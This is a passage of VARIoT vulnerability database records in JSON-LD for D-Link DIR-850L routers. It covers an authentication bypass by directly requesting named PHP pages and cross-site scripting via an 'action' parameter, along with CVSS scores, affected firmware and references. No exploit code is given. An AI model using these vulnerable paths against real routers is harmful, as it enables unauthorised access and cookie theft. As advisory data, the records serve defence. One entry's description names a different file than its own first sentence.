        "db": "CNNVD",
        "id": "CNNVD-201803-992"
      }
    ]
  },
  "description": {
    "@context": {
      "@vocab": "https://www.variotdbs.pl/ref/description#",
      "sources": {
        "@container": "@list",
        "@context": {
          "@vocab": "https://www.variotdbs.pl/ref/sources#"
        }
      }
    },
    "data": "An authentication bypass vulnerability on D-Link DIR-850L Wireless AC1200 Dual Band Gigabit Cloud Router (Hardware Version : A1, B1; Firmware Version : 1.02-2.06) devices potentially allows attackers to bypass SharePort Web Access Portal by directly visiting /category_view.php or /folder_view.php. The D-Link DIR-850L device contains an authentication vulnerability. Information may be obtained or altered, and service operation may be disrupted (DoS). The D-Link DIR-850L Wireless AC1200 Dual Band Gigabit Cloud Router is a wireless router product of D-Link. An authentication bypass vulnerability exists in the D-Link DIR-850L Wireless AC1200 Dual Band Gigabit Cloud Router. An attacker could exploit the vulnerability to bypass the SharePort Web Access Portal by directly accessing the /category_view.php or /folder_view.php file.",
    "sources": [
      {
        "db": "NVD",
        "id": "CVE-2018-9032"
      },
      {
        "db": "JVNDB",
        "id": "JVNDB-2018-003365"
      },
      {
        "db": "CNVD",
        "id": "CNVD-2018-06792"
      }
    ],
    "trust": 2.16
  },
  "external_ids": {
    "@context": {
      "@vocab": "https://www.variotdbs.pl/ref/external_ids#",
      "data": {
        "@container": "@list"
      },
      "sources": {
        "@container": "@list",
        "@context": {
          "@vocab": "https://www.variotdbs.pl/ref/sources#"
        }
      }
    },
    "data": [
      {
        "db": "NVD",
        "id": "CVE-2018-9032",
        "trust": 3.0
      },
      {
        "db": "EXPLOIT-DB",
        "id": "44378",
        "trust": 2.4
      },
      {
        "db": "JVNDB",
        "id": "JVNDB-2018-003365",
        "trust": 0.8
      },
      {
        "db": "CNVD",
        "id": "CNVD-2018-06792",
        "trust": 0.6
      },
      {
        "db": "CNNVD",
        "id": "CNNVD-201803-992",
        "trust": 0.6
      }
    ],
    "sources": [
      {
        "db": "CNVD",
        "id": "CNVD-2018-06792"
      },
      {
        "db": "JVNDB",
        "id": "JVNDB-2018-003365"
      },
      {
        "db": "NVD",
        "id": "CVE-2018-9032"
      },
      {
        "db": "CNNVD",
        "id": "CNNVD-201803-992"
      }
    ]
  },
  "id": "VAR-201803-1970",
  "iot": {
    "@context": {
      "@vocab": "https://www.variotdbs.pl/ref/iot#",
      "sources": {
        "@container": "@list",
        "@context": {
          "@vocab": "https://www.variotdbs.pl/ref/sources#"
        }
      }
    },
    "data": true,
    "sources": [
      {
        "db": "CNVD",
        "id": "CNVD-2018-06792"
      }
    ],
    "trust": 1.35
  },
  "iot_taxonomy": {
    "@context": {
      "@vocab": "https://www.variotdbs.pl/ref/iot_taxonomy#",
      "data": {
        "@container": "@list"
      },
      "sources": {
        "@container": "@list",
        "@context": {
          "@vocab": "https://www.variotdbs.pl/ref/sources#"
        }
      }
    },
    "data": [
      {
        "category": [
          "IoT",
          "Network device"
        ],
        "sub_category": null,
        "trust": 0.6
      }
    ],
    "sources": [
      {
        "db": "CNVD",
        "id": "CNVD-2018-06792"
      }
    ]
  },
  "last_update_date": "2023-12-18T13:08:32.596000Z",
  "patch": {
    "@context": {
      "@vocab": "https://www.variotdbs.pl/ref/patch#",
      "data": {
        "@container": "@list"
      },
      "sources": {
        "@container": "@list",
        "@context": {
          "@vocab": "https://www.variotdbs.pl/ref/sources#"
        }
      }
    },
    "data": [
      {
        "title": "Top Page",
        "trust": 0.8,
        "url": "http://us.dlink.com/about/"
      }
    ],
    "sources": [
      {
        "db": "JVNDB",
        "id": "JVNDB-2018-003365"
      }
    ]
  },
  "problemtype_data": {
    "@context": {
      "@vocab": "https://www.variotdbs.pl/ref/problemtype_data#",
      "sources": {
        "@container": "@list",
        "@context": {
          "@vocab": "https://www.variotdbs.pl/ref/sources#"
        }
      }
    },
    "data": [
      {
        "problemtype": "CWE-287",
        "trust": 1.8
      }
    ],
    "sources": [
      {
        "db": "JVNDB",
        "id": "JVNDB-2018-003365"
      },
      {
        "db": "NVD",
        "id": "CVE-2018-9032"
      }
    ]
  },
  "references": {
    "@context": {
      "@vocab": "https://www.variotdbs.pl/ref/references#",
      "data": {
        "@container": "@list"
      },
      "sources": {
        "@container": "@list",
        "@context": {
          "@vocab": "https://www.variotdbs.pl/ref/sources#"
        }
      }
    },
    "data": [
      {
        "trust": 2.4,
        "url": "https://www.exploit-db.com/exploits/44378/"
      },
      {
        "trust": 2.2,
        "url": "https://www.youtube.com/watch?v=wmm4p8zns3s"
      },
      {
        "trust": 0.8,
        "url": "https://cve.mitre.org/cgi-bin/cvename.cgi?name=cve-2018-9032"
      },
      {
        "trust": 0.8,
        "url": "https://nvd.nist.gov/vuln/detail/cve-2018-9032"
      }
    ],
    "sources": [
      {
        "db": "CNVD",
        "id": "CNVD-2018-06792"
      },
      {
        "db": "JVNDB",
        "id": "JVNDB-2018-003365"
      },
      {
        "db": "NVD",
        "id": "CVE-2018-9032"
      },
      {
        "db": "CNNVD",
        "id": "CNNVD-201803-992"
      }
    ]
  },
  "sources": {
    "@context": {
      "@vocab": "https://www.variotdbs.pl/ref/sources#",
      "data": {
        "@container": "@list"
      }
    },
    "data": [
      {
        "db": "CNVD",
        "id": "CNVD-2018-06792"
      },
      {
        "db": "JVNDB",
        "id": "JVNDB-2018-003365"
      },
      {
        "db": "NVD",
        "id": "CVE-2018-9032"
      },
      {
        "db": "CNNVD",
        "id": "CNNVD-201803-992"
      }
    ]
  },
  "sources_release_date": {
    "@context": {
      "@vocab": "https://www.variotdbs.pl/ref/sources_release_date#",
      "data": {
        "@container": "@list"
      }
    },
    "data": [
      {
        "date": "2018-03-30T00:00:00",
        "db": "CNVD",
        "id": "CNVD-2018-06792"
      },
      {
        "date": "2018-05-23T00:00:00",
        "db": "JVNDB",
        "id": "JVNDB-2018-003365"
      },
      {
        "date": "2018-03-27T03:29:00.480000",
        "db": "NVD",
        "id": "CVE-2018-9032"
      },
      {
        "date": "2018-03-28T00:00:00",
        "db": "CNNVD",
        "id": "CNNVD-201803-992"
      }
    ]
  },
  "sources_update_date": {
    "@context": {
      "@vocab": "https://www.variotdbs.pl/ref/sources_update_date#",
      "data": {
        "@container": "@list"
      }
    },
    "data": [
      {
        "date": "2018-03-30T00:00:00",
        "db": "CNVD",
        "id": "CNVD-2018-06792"
      },
      {
        "date": "2018-05-23T00:00:00",
        "db": "JVNDB",
        "id": "JVNDB-2018-003365"
      },
      {
        "date": "2021-04-23T15:48:21.893000",
        "db": "NVD",
        "id": "CVE-2018-9032"
      },
      {
        "date": "2021-04-25T00:00:00",
        "db": "CNNVD",
        "id": "CNNVD-201803-992"
      }
    ]
  },
  "threat_type": {
    "@context": {
      "@vocab": "https://www.variotdbs.pl/ref/threat_type#",
      "sources": {
        "@container": "@list",
        "@context": {
          "@vocab": "https://www.variotdbs.pl/ref/sources#"
        }
      }
    },
    "data": "remote",
    "sources": [
      {
        "db": "CNNVD",
        "id": "CNNVD-201803-992"
      }
    ],
    "trust": 0.6
  },
  "title": {
    "@context": {
      "@vocab": "https://www.variotdbs.pl/ref/title#",
      "sources": {
        "@container": "@list",
        "@context": {
          "@vocab": "https://www.variotdbs.pl/ref/sources#"
        }
      }
    },
    "data": "D-Link DIR-850L Authentication vulnerabilities in devices",
    "sources": [
      {
        "db": "JVNDB",
        "id": "JVNDB-2018-003365"
      }
    ],
    "trust": 0.8
  },
  "type": {
    "@context": {
      "@vocab": "https://www.variotdbs.pl/ref/type#",
      "sources": {
        "@container": "@list",
        "@context": {
          "@vocab": "https://www.variotdbs.pl/ref/sources#"
        }
      }
    },
    "data": "authorization issue",
    "sources": [
      {
        "db": "CNNVD",
        "id": "CNNVD-201803-992"
      }
    ],
    "trust": 0.6
  }
}

VAR-201709-0587

Vulnerability from variot - Updated: 2023-12-18 13:02

D-Link DIR-850L REV. A (with firmware through FW114WWb07_h2ab_beta1) devices have XSS in the action parameter to htdocs/web/wandetect.php. The D-Link DIR-850L device firmware contains a cross-site scripting vulnerability. Information may be obtained and information may be altered. D-Link DIR-850L REV. A is a wireless router from D-Link. A remote attacker could exploit the vulnerability to steal authentication cookies by sending an ‘action’ parameter to the htdocs/web/wandetect.php file.


{
  "@context": {
    "@vocab": "https://www.variotdbs.pl/ref/VARIoTentry#",
    "affected_products": {
      "@id": "https://www.variotdbs.pl/ref/affected_products"
    },
    "configurations": {
      "@id": "https://www.variotdbs.pl/ref/configurations"
    },
    "credits": {
      "@id": "https://www.variotdbs.pl/ref/credits"
    },
    "cvss": {
      "@id": "https://www.variotdbs.pl/ref/cvss/"
    },
    "description": {
      "@id": "https://www.variotdbs.pl/ref/description/"
    },
    "exploit_availability": {
      "@id": "https://www.variotdbs.pl/ref/exploit_availability/"
    },
    "external_ids": {
      "@id": "https://www.variotdbs.pl/ref/external_ids/"
    },
    "iot": {
      "@id": "https://www.variotdbs.pl/ref/iot/"
    },
    "iot_taxonomy": {
      "@id": "https://www.variotdbs.pl/ref/iot_taxonomy/"
    },
    "patch": {
      "@id": "https://www.variotdbs.pl/ref/patch/"
    },
    "problemtype_data": {
      "@id": "https://www.variotdbs.pl/ref/problemtype_data/"
    },
    "references": {
      "@id": "https://www.variotdbs.pl/ref/references/"
    },
    "sources": {
      "@id": "https://www.variotdbs.pl/ref/sources/"
    },
    "sources_release_date": {
      "@id": "https://www.variotdbs.pl/ref/sources_release_date/"
    },
    "sources_update_date": {
      "@id": "https://www.variotdbs.pl/ref/sources_update_date/"
    },
    "threat_type": {
      "@id": "https://www.variotdbs.pl/ref/threat_type/"
    },
    "title": {
      "@id": "https://www.variotdbs.pl/ref/title/"
    },
    "type": {
      "@id": "https://www.variotdbs.pl/ref/type/"
    }
  },
  "@id": "https://www.variotdbs.pl/vuln/VAR-201709-0587",
  "affected_products": {
    "@context": {
      "@vocab": "https://www.variotdbs.pl/ref/affected_products#",
      "data": {
        "@container": "@list"
      },
      "sources": {
        "@container": "@list",
        "@context": {
          "@vocab": "https://www.variotdbs.pl/ref/sources#"
        },
        "@id": "https://www.variotdbs.pl/ref/sources"
      }
    },
    "data": [
      {
        "model": "dir-850l",
        "scope": "eq",
        "trust": 1.0,
        "vendor": "dlink",
        "version": "fw114wwb07_h2ab"
      },
      {
        "model": "dir-850l",
        "scope": "lt",
        "trust": 1.0,
        "vendor": "dlink",
        "version": "fw114wwb07_h2ab"
      },
      {
        "model": "dir-850l",
        "scope": "lte",
        "trust": 0.8,
        "vendor": "d link",
        "version": "fw114wwb07_h2ab_beta1"
      },
      {
        "model": "dir-850l rev.a \u003c=fw114wwb07 h2ab beta1",
        "scope": null,
        "trust": 0.6,
        "vendor": "d link",
        "version": null
      },
      {
        "model": "dir-850l",
        "scope": "eq",
        "trust": 0.6,
        "vendor": "d link",
        "version": "fw114wwb07_h2ab"
      }
    ],
    "sources": [
      {
        "db": "CNVD",
        "id": "CNVD-2017-31793"
      },
      {
        "db": "JVNDB",
        "id": "JVNDB-2017-008097"
      },
      {
        "db": "NVD",
        "id": "CVE-2017-14416"
      },
      {
        "db": "CNNVD",
        "id": "CNNVD-201709-579"
      }
    ]
  },
  "configurations": {
    "@context": {
      "@vocab": "https://www.variotdbs.pl/ref/configurations#",
      "children": {
        "@container": "@list"
      },
      "cpe_match": {
        "@container": "@list"
      },
      "data": {
        "@container": "@list"
      },
      "nodes": {
        "@container": "@list"
      }
    },
    "data": [
      {
        "CVE_data_version": "4.0",
        "nodes": [
          {
            "children": [
              {
                "children": [],
                "cpe_match": [
                  {
                    "cpe23Uri": "cpe:2.3:o:dlink:dir-850l_firmware:*:*:*:*:*:*:*:*",
                    "cpe_name": [],
                    "versionEndExcluding": "fw114wwb07_h2ab",
                    "vulnerable": true
                  },
                  {
                    "cpe23Uri": "cpe:2.3:o:dlink:dir-850l_firmware:fw114wwb07_h2ab:beta1:*:*:*:*:*:*",
                    "cpe_name": [],
                    "vulnerable": true
                  }
                ],
                "operator": "OR"
              },
              {
                "children": [],
                "cpe_match": [
                  {
                    "cpe23Uri": "cpe:2.3:h:dlink:dir-850l:-:*:*:*:*:*:*:*",
                    "cpe_name": [],
                    "vulnerable": false
                  }
                ],
                "operator": "OR"
              }
            ],
            "cpe_match": [],
            "operator": "AND"
          }
        ]
      }
    ],
    "sources": [
      {
        "db": "NVD",
        "id": "CVE-2017-14416"
      }
    ]
  },
  "cve": "CVE-2017-14416",
  "cvss": {
    "@context": {
      "cvssV2": {
        "@container": "@list",
        "@context": {
          "@vocab": "https://www.variotdbs.pl/ref/cvss/cvssV2#"
        },
        "@id": "https://www.variotdbs.pl/ref/cvss/cvssV2"
      },
      "cvssV3": {
        "@container": "@list",
        "@context": {
          "@vocab": "https://www.variotdbs.pl/ref/cvss/cvssV3#"
        },
        "@id": "https://www.variotdbs.pl/ref/cvss/cvssV3/"
      },
      "severity": {
        "@container": "@list",
        "@context": {
          "@vocab": "https://www.variotdbs.pl/cvss/severity#"
        },
        "@id": "https://www.variotdbs.pl/ref/cvss/severity"
      },
      "sources": {
        "@container": "@list",
        "@context": {
          "@vocab": "https://www.variotdbs.pl/ref/sources#"
        },
        "@id": "https://www.variotdbs.pl/ref/sources"
      }
    },
    "data": [
      {
        "cvssV2": [
          {
            "acInsufInfo": false,
            "accessComplexity": "MEDIUM",
            "accessVector": "NETWORK",
            "authentication": "NONE",
            "author": "NVD",
            "availabilityImpact": "NONE",
            "baseScore": 4.3,
            "confidentialityImpact": "NONE",
            "exploitabilityScore": 8.6,
            "impactScore": 2.9,
            "integrityImpact": "PARTIAL",
            "obtainAllPrivilege": false,
            "obtainOtherPrivilege": false,
            "obtainUserPrivilege": false,
            "severity": "MEDIUM",
            "trust": 1.0,
            "userInteractionRequired": true,
            "vectorString": "AV:N/AC:M/Au:N/C:N/I:P/A:N",
            "version": "2.0"
          },
          {
            "acInsufInfo": null,
            "accessComplexity": "Medium",
            "accessVector": "Network",
            "authentication": "None",
            "author": "NVD",
            "availabilityImpact": "None",
            "baseScore": 4.3,
            "confidentialityImpact": "None",
            "exploitabilityScore": null,
            "id": "CVE-2017-14416",
            "impactScore": null,
            "integrityImpact": "Partial",
            "obtainAllPrivilege": null,
            "obtainOtherPrivilege": null,
            "obtainUserPrivilege": null,
            "severity": "Medium",
            "trust": 0.8,
            "userInteractionRequired": null,
            "vectorString": "AV:N/AC:M/Au:N/C:N/I:P/A:N",
            "version": "2.0"
          },
          {
            "accessComplexity": "MEDIUM",
            "accessVector": "NETWORK",
            "authentication": "NONE",
            "author": "CNVD",
            "availabilityImpact": "NONE",
            "baseScore": 4.3,
            "confidentialityImpact": "NONE",
            "exploitabilityScore": 8.6,
            "id": "CNVD-2017-31793",
            "impactScore": 2.9,
            "integrityImpact": "PARTIAL",
            "severity": "MEDIUM",
            "trust": 0.6,
            "vectorString": "AV:N/AC:M/Au:N/C:N/I:P/A:N",
            "version": "2.0"
          },
          {
            "accessComplexity": "MEDIUM",
            "accessVector": "NETWORK",
            "authentication": "NONE",
            "author": "VULHUB",
            "availabilityImpact": "NONE",
            "baseScore": 4.3,
            "confidentialityImpact": "NONE",
            "exploitabilityScore": 8.6,
            "id": "VHN-105136",
            "impactScore": 2.9,
            "integrityImpact": "PARTIAL",
            "severity": "MEDIUM",
            "trust": 0.1,
            "vectorString": "AV:N/AC:M/AU:N/C:N/I:P/A:N",
            "version": "2.0"
          }
        ],
        "cvssV3": [
          {
            "attackComplexity": "LOW",
            "attackVector": "NETWORK",
            "author": "NVD",
            "availabilityImpact": "NONE",
            "baseScore": 6.1,
            "baseSeverity": "MEDIUM",
            "confidentialityImpact": "LOW",
            "exploitabilityScore": 2.8,
            "impactScore": 2.7,
            "integrityImpact": "LOW",
            "privilegesRequired": "NONE",
            "scope": "CHANGED",
            "trust": 1.0,
            "userInteraction": "REQUIRED",
            "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:R/S:C/C:L/I:L/A:N",
            "version": "3.1"
          },
          {
            "attackComplexity": "Low",
            "attackVector": "Network",
            "author": "NVD",
            "availabilityImpact": "None",
            "baseScore": 6.1,
            "baseSeverity": "Medium",
            "confidentialityImpact": "Low",
            "exploitabilityScore": null,
            "id": "CVE-2017-14416",
            "impactScore": null,
            "integrityImpact": "Low",
            "privilegesRequired": "None",
            "scope": "Changed",
            "trust": 0.8,
            "userInteraction": "Required",
            "vectorString": "CVSS:3.0/AV:N/AC:L/PR:N/UI:R/S:C/C:L/I:L/A:N",
            "version": "3.0"
          }
        ],
        "severity": [
          {
            "author": "NVD",
            "id": "CVE-2017-14416",
            "trust": 1.8,
            "value": "MEDIUM"
          },
          {
            "author": "CNVD",
            "id": "CNVD-2017-31793",
            "trust": 0.6,
            "value": "MEDIUM"
          },
          {
            "author": "CNNVD",
            "id": "CNNVD-201709-579",
            "trust": 0.6,
            "value": "MEDIUM"
          },
          {
            "author": "VULHUB",
            "id": "VHN-105136",
            "trust": 0.1,
            "value": "MEDIUM"
          }
        ]
      }
    ],
    "sources": [
      {
        "db": "CNVD",
        "id": "CNVD-2017-31793"
      },
      {
        "db": "VULHUB",
        "id": "VHN-105136"
      },
      {
        "db": "JVNDB",
        "id": "JVNDB-2017-008097"
      },
      {
        "db": "NVD",
        "id": "CVE-2017-14416"
      },
      {
        "db": "CNNVD",
        "id": "CNNVD-201709-579"
      }
    ]
  },
  "description": {
    "@context": {
      "@vocab": "https://www.variotdbs.pl/ref/description#",
      "sources": {
        "@container": "@list",
        "@context": {
          "@vocab": "https://www.variotdbs.pl/ref/sources#"
        }
      }
    },
    "data": "D-Link DIR-850L REV. A (with firmware through FW114WWb07_h2ab_beta1) devices have XSS in the action parameter to htdocs/web/wandetect.php. The D-Link DIR-850L device firmware contains a cross-site scripting vulnerability. Information may be obtained and information may be altered. D-Link DIR-850L REV. A is a wireless router from D-Link. A remote attacker could exploit the vulnerability to steal authentication cookies by sending an ‘action’ parameter to the htdocs/web/wandetect.php file.",
    "sources": [
      {
        "db": "NVD",
        "id": "CVE-2017-14416"
      },
      {
        "db": "JVNDB",
        "id": "JVNDB-2017-008097"
      },
      {
        "db": "CNVD",
        "id": "CNVD-2017-31793"
      },
      {
        "db": "VULHUB",
        "id": "VHN-105136"
      }
    ],
    "trust": 2.25
  },
  "external_ids": {
    "@context": {
      "@vocab": "https://www.variotdbs.pl/ref/external_ids#",
      "data": {
        "@container": "@list"
      },
      "sources": {
        "@container": "@list",
        "@context": {
          "@vocab": "https://www.variotdbs.pl/ref/sources#"
        }
      }
    },
    "data": [
      {
        "db": "NVD",
        "id": "CVE-2017-14416",
        "trust": 3.1
      },
      {
        "db": "JVNDB",
        "id": "JVNDB-2017-008097",
        "trust": 0.8
      },
      {
        "db": "CNNVD",
        "id": "CNNVD-201709-579",
        "trust": 0.7
      },
      {
        "db": "CNVD",
        "id": "CNVD-2017-31793",
        "trust": 0.6
      },
      {
        "db": "VULHUB",
        "id": "VHN-105136",
        "trust": 0.1
      }
    ],
    "sources": [
      {
        "db": "CNVD",
        "id": "CNVD-2017-31793"
      },
      {
        "db": "VULHUB",
        "id": "VHN-105136"
      },
      {
        "db": "JVNDB",
        "id": "JVNDB-2017-008097"
      },
      {
        "db": "NVD",
        "id": "CVE-2017-14416"
      },
      {
        "db": "CNNVD",
        "id": "CNNVD-201709-579"
      }
    ]
  },
  "id": "VAR-201709-0587",
  "iot": {
    "@context": {
      "@vocab": "https://www.variotdbs.pl/ref/iot#",
      "sources": {
        "@container": "@list",
        "@context": {
          "@vocab": "https://www.variotdbs.pl/ref/sources#"
        }
      }
    },
    "data": true,
    "sources": [
      {
        "db": "CNVD",
        "id": "CNVD-2017-31793"
      },
      {
        "db": "VULHUB",
        "id": "VHN-105136"
      }
    ],
    "trust": 1.7
  },
  "iot_taxonomy": {
    "@context": {
      "@vocab": "https://www.variotdbs.pl/ref/iot_taxonomy#",
      "data": {
        "@container": "@list"
      },
      "sources": {
        "@container": "@list",
        "@context": {
          "@vocab": "https://www.variotdbs.pl/ref/sources#"
        }
      }
    },
    "data": [
      {
        "category": [
          "IoT",
          "Network device"
        ],
        "sub_category": null,
        "trust": 0.6
      }
    ],
    "sources": [
      {
        "db": "CNVD",
        "id": "CNVD-2017-31793"
      }
    ]
  },
  "last_update_date": "2023-12-18T13:02:57.455000Z",
  "patch": {
    "@context": {
      "@vocab": "https://www.variotdbs.pl/ref/patch#",
      "data": {
        "@container": "@list"
      },
      "sources": {
        "@container": "@list",
        "@context": {
          "@vocab": "https://www.variotdbs.pl/ref/sources#"
        }
      }
    },
    "data": [
      {
        "title": "DIR-850L",
        "trust": 0.8,
        "url": "http://support.dlink.com/productinfo.aspx?m=dir-850l"
      },
      {
        "title": "D-Link DIR-850L REV.A Fixes for cross-site scripting vulnerabilities",
        "trust": 0.6,
        "url": "http://123.124.177.30/web/xxk/bdxqbyid.tag?id=235004"
      }
    ],
    "sources": [
      {
        "db": "JVNDB",
        "id": "JVNDB-2017-008097"
      },
      {
        "db": "CNNVD",
        "id": "CNNVD-201709-579"
      }
    ]
  },
  "problemtype_data": {
    "@context": {
      "@vocab": "https://www.variotdbs.pl/ref/problemtype_data#",
      "sources": {
        "@container": "@list",
        "@context": {
          "@vocab": "https://www.variotdbs.pl/ref/sources#"
        }
      }
    },
    "data": [
      {
        "problemtype": "CWE-79",
        "trust": 1.9
      }
    ],
    "sources": [
      {
        "db": "VULHUB",
        "id": "VHN-105136"
      },
      {
        "db": "JVNDB",
        "id": "JVNDB-2017-008097"
      },
      {
        "db": "NVD",
        "id": "CVE-2017-14416"
      }
    ]
  },
  "references": {
    "@context": {
      "@vocab": "https://www.variotdbs.pl/ref/references#",
      "data": {
        "@container": "@list"
      },
      "sources": {
        "@container": "@list",
        "@context": {
          "@vocab": "https://www.variotdbs.pl/ref/sources#"
        }
      }
    },
    "data": [
      {
        "trust": 2.5,
        "url": "https://pierrekim.github.io/blog/2017-09-08-dlink-850l-mydlink-cloud-0days-vulnerabilities.html"
      },
      {
        "trust": 1.4,
        "url": "https://nvd.nist.gov/vuln/detail/cve-2017-14416"
      },
      {
        "trust": 0.8,
        "url": "http://cve.mitre.org/cgi-bin/cvename.cgi?name=cve-2017-14416"
      }
    ],
    "sources": [
      {
        "db": "CNVD",
        "id": "CNVD-2017-31793"
      },
      {
        "db": "VULHUB",
        "id": "VHN-105136"
      },
      {
        "db": "JVNDB",
        "id": "JVNDB-2017-008097"
      },
      {
        "db": "NVD",
        "id": "CVE-2017-14416"
      },
      {
        "db": "CNNVD",
        "id": "CNNVD-201709-579"
      }
    ]
  },
  "sources": {
    "@context": {
      "@vocab": "https://www.variotdbs.pl/ref/sources#",
      "data": {
        "@container": "@list"
      }
    },
    "data": [
      {
        "db": "CNVD",
        "id": "CNVD-2017-31793"
      },
      {
        "db": "VULHUB",
        "id": "VHN-105136"
      },
      {
        "db": "JVNDB",
        "id": "JVNDB-2017-008097"
      },
      {
        "db": "NVD",
        "id": "CVE-2017-14416"
      },
      {
        "db": "CNNVD",
        "id": "CNNVD-201709-579"
      }
    ]
  },
  "sources_release_date": {
    "@context": {
      "@vocab": "https://www.variotdbs.pl/ref/sources_release_date#",
      "data": {
        "@container": "@list"
      }
    },
    "data": [
      {
        "date": "2017-10-27T00:00:00",
        "db": "CNVD",
        "id": "CNVD-2017-31793"
      },
      {
        "date": "2017-09-13T00:00:00",
        "db": "VULHUB",
        "id": "VHN-105136"
      },
      {
        "date": "2017-10-10T00:00:00",
        "db": "JVNDB",
        "id": "JVNDB-2017-008097"
      },
      {
        "date": "2017-09-13T17:29:00.323000",
        "db": "NVD",
        "id": "CVE-2017-14416"
      },
      {
        "date": "2017-09-18T00:00:00",
        "db": "CNNVD",
        "id": "CNNVD-201709-579"
      }
    ]
  },
  "sources_update_date": {
    "@context": {
      "@vocab": "https://www.variotdbs.pl/ref/sources_update_date#",
      "data": {
        "@container": "@list"
      }
    },
    "data": [
      {
        "date": "2017-10-27T00:00:00",
        "db": "CNVD",
        "id": "CNVD-2017-31793"
      },
      {
        "date": "2017-09-20T00:00:00",
        "db": "VULHUB",
        "id": "VHN-105136"
      },
      {
        "date": "2017-10-10T00:00:00",
        "db": "JVNDB",
        "id": "JVNDB-2017-008097"
      },
      {
        "date": "2023-11-08T20:23:52.593000",
        "db": "NVD",
        "id": "CVE-2017-14416"
      },
      {
        "date": "2023-04-27T00:00:00",
        "db": "CNNVD",
        "id": "CNNVD-201709-579"
      }
    ]
  },
  "threat_type": {
    "@context": {
      "@vocab": "https://www.variotdbs.pl/ref/threat_type#",
      "sources": {
        "@container": "@list",
        "@context": {
          "@vocab": "https://www.variotdbs.pl/ref/sources#"
        }
      }
    },
    "data": "remote",
    "sources": [
      {
        "db": "CNNVD",
        "id": "CNNVD-201709-579"
      }
    ],
    "trust": 0.6
  },
  "title": {
    "@context": {
      "@vocab": "https://www.variotdbs.pl/ref/title#",
      "sources": {
        "@container": "@list",
        "@context": {
          "@vocab": "https://www.variotdbs.pl/ref/sources#"
        }
      }
    },
    "data": "D-Link DIR-850L REV.A Cross-Site Scripting Vulnerability",
    "sources": [
      {
        "db": "CNVD",
        "id": "CNVD-2017-31793"
      },
      {
        "db": "CNNVD",
        "id": "CNNVD-201709-579"
      }
    ],
    "trust": 1.2
  },
  "type": {
    "@context": {
      "@vocab": "https://www.variotdbs.pl/ref/type#",
      "sources": {
        "@container": "@list",
        "@context": {
          "@vocab": "https://www.variotdbs.pl/ref/sources#"
        }
      }
    },
    "data": "XSS",
    "sources": [
      {
        "db": "CNNVD",
        "id": "CNNVD-201709-579"
      }
    ],
    "trust": 0.6
  }
}

VAR-201709-0585

Vulnerability from variot - Updated: 2023-12-18 12:51

D-Link DIR-850L REV. A (with firmware through FW114WWb07_h2ab_beta1) devices have XSS in the action parameter to htdocs/web/shareport.php. The D-Link DIR-850L device firmware contains a cross-site scripting vulnerability. Information may be obtained and information may be altered. D-Link DIR-850L REV. A is a wireless router from D-Link. A remote attacker could exploit the vulnerability to steal authentication cookies by sending an ‘action’ parameter to the htdocs/web/wandetect.php file [file name as given in the aggregated source text; the first sentence of this entry names htdocs/web/shareport.php as the affected script].


{
  "@context": {
    "@vocab": "https://www.variotdbs.pl/ref/VARIoTentry#",
    "affected_products": {
      "@id": "https://www.variotdbs.pl/ref/affected_products"
    },
    "configurations": {
      "@id": "https://www.variotdbs.pl/ref/configurations"
    },
    "credits": {
      "@id": "https://www.variotdbs.pl/ref/credits"
    },
    "cvss": {
      "@id": "https://www.variotdbs.pl/ref/cvss/"
    },
    "description": {
      "@id": "https://www.variotdbs.pl/ref/description/"
    },
    "exploit_availability": {
      "@id": "https://www.variotdbs.pl/ref/exploit_availability/"
    },
    "external_ids": {
      "@id": "https://www.variotdbs.pl/ref/external_ids/"
    },
    "iot": {
      "@id": "https://www.variotdbs.pl/ref/iot/"
    },
    "iot_taxonomy": {
      "@id": "https://www.variotdbs.pl/ref/iot_taxonomy/"
    },
    "patch": {
      "@id": "https://www.variotdbs.pl/ref/patch/"
    },
    "problemtype_data": {
      "@id": "https://www.variotdbs.pl/ref/problemtype_data/"
    },
    "references": {
      "@id": "https://www.variotdbs.pl/ref/references/"
    },
    "sources": {
      "@id": "https://www.variotdbs.pl/ref/sources/"
    },
    "sources_release_date": {
      "@id": "https://www.variotdbs.pl/ref/sources_release_date/"
    },
    "sources_update_date": {
      "@id": "https://www.variotdbs.pl/ref/sources_update_date/"
    },
    "threat_type": {
      "@id": "https://www.variotdbs.pl/ref/threat_type/"
    },
    "title": {
      "@id": "https://www.variotdbs.pl/ref/title/"
    },
    "type": {
      "@id": "https://www.variotdbs.pl/ref/type/"
    }
  },
  "@id": "https://www.variotdbs.pl/vuln/VAR-201709-0585",
  "affected_products": {
    "@context": {
      "@vocab": "https://www.variotdbs.pl/ref/affected_products#",
      "data": {
        "@container": "@list"
      },
      "sources": {
        "@container": "@list",
        "@context": {
          "@vocab": "https://www.variotdbs.pl/ref/sources#"
        },
        "@id": "https://www.variotdbs.pl/ref/sources"
      }
    },
    "data": [
      {
        "model": "dir-850l",
        "scope": "eq",
        "trust": 1.0,
        "vendor": "dlink",
        "version": "fw114wwb07_h2ab"
      },
      {
        "model": "dir-850l",
        "scope": "lt",
        "trust": 1.0,
        "vendor": "dlink",
        "version": "fw114wwb07_h2ab"
      },
      {
        "model": "dir-850l",
        "scope": "lte",
        "trust": 0.8,
        "vendor": "d link",
        "version": "fw114wwb07_h2ab_beta1"
      },
      {
        "model": "dir-850l rev.a \u003c=fw114wwb07 h2ab beta1",
        "scope": null,
        "trust": 0.6,
        "vendor": "d link",
        "version": null
      },
      {
        "model": "dir-850l",
        "scope": "eq",
        "trust": 0.6,
        "vendor": "d link",
        "version": "fw114wwb07_h2ab"
      }
    ],
    "sources": [
      {
        "db": "CNVD",
        "id": "CNVD-2017-31795"
      },
      {
        "db": "JVNDB",
        "id": "JVNDB-2017-008095"
      },
      {
        "db": "NVD",
        "id": "CVE-2017-14414"
      },
      {
        "db": "CNNVD",
        "id": "CNNVD-201709-581"
      }
    ]
  },
  "configurations": {
    "@context": {
      "@vocab": "https://www.variotdbs.pl/ref/configurations#",
      "children": {
        "@container": "@list"
      },
      "cpe_match": {
        "@container": "@list"
      },
      "data": {
        "@container": "@list"
      },
      "nodes": {
        "@container": "@list"
      }
    },
    "data": [
      {
        "CVE_data_version": "4.0",
        "nodes": [
          {
            "children": [
              {
                "children": [],
                "cpe_match": [
                  {
                    "cpe23Uri": "cpe:2.3:o:dlink:dir-850l_firmware:*:*:*:*:*:*:*:*",
                    "cpe_name": [],
                    "versionEndExcluding": "fw114wwb07_h2ab",
                    "vulnerable": true
                  },
                  {
                    "cpe23Uri": "cpe:2.3:o:dlink:dir-850l_firmware:fw114wwb07_h2ab:beta1:*:*:*:*:*:*",
                    "cpe_name": [],
